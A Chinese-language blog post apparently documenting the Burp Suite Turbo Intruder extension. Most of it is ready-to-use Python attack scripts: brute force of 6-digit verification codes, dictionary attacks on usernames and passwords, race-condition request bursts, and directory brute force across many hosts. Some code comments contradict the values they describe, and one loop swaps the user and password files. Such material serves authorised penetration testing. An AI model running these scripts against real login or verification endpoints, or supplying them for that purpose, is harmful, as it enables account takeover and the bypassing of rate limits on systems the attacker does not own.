摘要:记录一下burpsuite中Turbo Intruder插件使用。

配置环境

burp版本:Burp Suite Professional v2023.11.1.1
Turbo Intruder版本:v1.42

使用方法

第一步:
在post数据包中选择要爆破的字段,然后发送到Turbo Intruder插件。

Turbo Intruder插件使用记录1.png

第二步:
可以看到之前要爆破的字段已经被替换为占位符。然后选择内置的examples/basic.py脚本(切记py脚本中一定不能含有中文),将字典修改为你自己的字典。最后点击"Attack"按钮就行了。

Turbo Intruder插件使用记录2.png

第三步
下面是已经爆破完成后的状态

Turbo Intruder插件使用记录3.png

提升爆破速度

Turbo Intruder中对速度影响较大的参数主要有:concurrentConnections,requestsPerConnection,pipeline

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,    #指定目标的地址
                           concurrentConnections=5,    #与服务器建立30条连接
                           requestsPerConnection=100,    #每条连接同时发送100个请求
                           pipeline=True   #开启管道(HTTP Pipelining)模式
                           )

    for word in open('/usr/share/dict/words'):
        engine.queue(target.req, word.rstrip())


def handleResponse(req, interesting):
    # currently available attributes are req.status, req.wordcount, req.length and req.response
    if req.status != 404:
        table.add(req)

参数的详细解释可以参考:Turbo Intruder 使用 - 拥抱十亿请求攻击

自定义脚本编写

以上面的脚本为例,编写的脚本只需要实现queueRequests、handleResponse两个函数。然后在queueRequests中定义RequestEngine类就行了。其余就按照python3的正常写法。需要注意Turbo Intruder不会对你字典中的数据做任何更改,因此post数据包中的body需要自己用quote函数进行urlencode。同时编写的时候尽量用pycharm编写,不然可能有各种奇奇怪怪的问题

以下是经过测试可以用的脚本,仅作参考:

from urllib import quote
from itertools import product


def brute_veify_code(target, code_length):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=True
                           )
    pattern = '1234567890'  # 用于生成字典的迭代对像
    for i in list(product(pattern, repeat=code_length)):  # product()接收多个迭代对像,然后生成一个笛卡尔积,repeat参数代表重复迭代对象次数。
        code = ''.join(i)
        engine.queue(target.req, code)


def user_brute(target, user_dict_path):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=True
                           )
    for word in open(user_dict_path):
        engine.queue(target.req, quote(word.rstrip()))


def password_brute(target, password_dict_path):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=True
                           )
    for word in open(password_dict_path):
        engine.queue(target.req, quote(word.rstrip()))


def user_password_brute(target, user_dict_path, password_dict_path):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=True
                           )
    for password in open(user_dict_path):
        for user in open(password_dict_path):
            engine.queue(target.req, [quote(user.rstrip()), quote(password.rstrip())])


def shorttime_concurrent_brute(target, connections=100):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=connections,
                           requestsPerConnection=1,
                           pipeline=False
                           )
    # the 'gate' argument withholds part of each request until openGate is invoked
    # if you see a negative timestamp, the server responded before the request was complete
    for i in range(connections):
        # "gate"参数会阻塞每个请求的最后一个字节,直到调用openGate
        engine.queue(target.req, gate='race1')

    # once every 'race1' tagged request has been queued
    # invoke engine.openGate() to send them in sync
    # 发送每个请求的最后一个字节
    engine.openGate('race1')

    # 设置最迟120秒显示结果
    engine.complete(timeout=120)


def mult_host_dir_brute(url_dict_path, domain_dict_path):
    engines = {}
    req = '''GET /%s HTTP/1.1
Host: %s
Connection: keep-alive
'''
    for domain in open(domain_dict_path):
        domain = domain.rstrip()
        engine = RequestEngine(endpoint='https://' + domain + ':443',
                               concurrentConnections=30,
                               requestsPerConnection=100,
                               pipeline=True)
        engines[domain] = engine

    for url in open(url_dict_path):
        url = url.rstrip()
        for (domain, engine) in engines.items():
            engine.queue(req, [url, domain])


def queueRequests(target, wordlists):
    #使用前自行更改字典路径
    #user_brute(target, "user_dict_path")
    #password_brute(target, "password_dict_path")
    #user_password_brute(target, "user_dict_path", "password_dict_path")
    brute_veify_code(target, 6)
    #mult_host_dir_brute("url_dict_path", "domain_dict_path")
    #shorttime_concurrent_brute(target, 100)


def handleResponse(req, interesting):
    # currently available attributes are req.status, req.wordcount, req.length and req.response
    table.add(req)

一些参考

Turbo Intruder:突破速率限制
Turbo Intruder 使用 - 拥抱十亿请求攻击

文章目录